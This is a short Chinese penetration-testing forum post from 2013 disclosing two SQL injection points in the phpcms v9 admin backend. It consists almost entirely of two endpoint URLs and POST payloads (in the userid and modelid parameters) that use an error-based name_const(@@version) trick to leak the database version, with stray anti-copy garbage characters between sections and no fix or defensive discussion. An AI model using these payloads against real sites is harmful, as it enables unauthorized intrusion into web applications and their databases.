中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]

作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):
; [, w' S  S( p- b  b: f

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


! A- |3 K  O3 s1 B9 S* D
8 M; W) V* [% X9 Z" V, K
( t) U( c7 H+ W  \$ h

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2